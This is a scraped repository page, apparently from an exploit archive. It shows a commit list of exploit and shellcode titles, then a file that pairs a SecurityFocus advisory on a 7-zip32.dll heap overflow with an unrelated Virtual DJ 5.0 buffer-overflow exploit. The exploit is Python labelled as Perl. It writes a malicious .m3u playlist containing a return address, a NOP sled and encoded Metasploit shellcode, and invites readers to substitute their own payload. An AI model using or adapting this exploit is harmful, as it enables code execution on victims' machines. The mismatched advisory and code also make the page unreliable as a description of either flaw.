880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
54 lines
No EOL
2.1 KiB
Perl
Executable file
54 lines
No EOL
2.1 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/25545/info
|
|
|
|
|
|
AkkyWareHOUSE 7-zip32.dll is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.
|
|
|
|
Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
|
|
|
|
Versions prior to 7-zip32.dll 4.42.00.04 are vulnerable.
|
|
|
|
#Virtual DJ 5.0 Local Buffer OverFlow
|
|
#224 bytes available for shellcode,, you can replace it with you
|
|
favourite one,,
|
|
#ret addr -> 0x7199403D jmp esp in mswsock.dll Winxp sp0
|
|
#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode
|
|
-224]
|
|
#Discovred by 0x58 && Coded By miyy3t,,Midt's lab !!
|
|
#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,,
|
|
Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
|
|
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub
|
|
http://metasploit.com
|
|
|
|
shellcode =
|
|
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84"
|
|
shellcode+=
|
|
"\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d"
|
|
shellcode+=
|
|
"\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91"
|
|
shellcode+=
|
|
"\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5"
|
|
shellcode+=
|
|
"\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe"
|
|
shellcode+=
|
|
"\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc"
|
|
shellcode+=
|
|
"\x80\x12\xcf\x18\xe0\x5a\xbe\xe8\x01\x11\x86\xd4\x0f\x91\xf2\x53"
|
|
shellcode+=
|
|
"\xf4\xcd\x53\x53\xec\xd9\x15\xd1\x0f\x51\x4e\xd8\x84\xd1\x75\xb0"
|
|
shellcode+=
|
|
"\xb8\x8e\xcf\x2e\xe4\x87\x77\x20\x07\x11\x85\x88\xec\x21\x74\xdc"
|
|
shellcode+=
|
|
"\xdb\xb9\x66\x26\x0e\xdf\xa9\x27\x63\xb2\x9f\xb4\xe7\xff\x9b\xa0"
|
|
shellcode+= "\xe1\xd1\xfe\xd8"
|
|
|
|
bof = "A"*484+"\x3D\x40\x99\x71"+"\x90"*10+shellcode
|
|
|
|
file = open('c:\/xploit.m3u','w+')
|
|
file.write("#EXTM3U\n");
|
|
file.write("#EXTINF:0,TITLE\n")
|
|
file.write("C:/")
|
|
file.write(bof)
|
|
file.close()
|
|
|
|
print "Exploit generated in c:\/xploit.m3u ...now open it with virtual
|
|
dj !! " |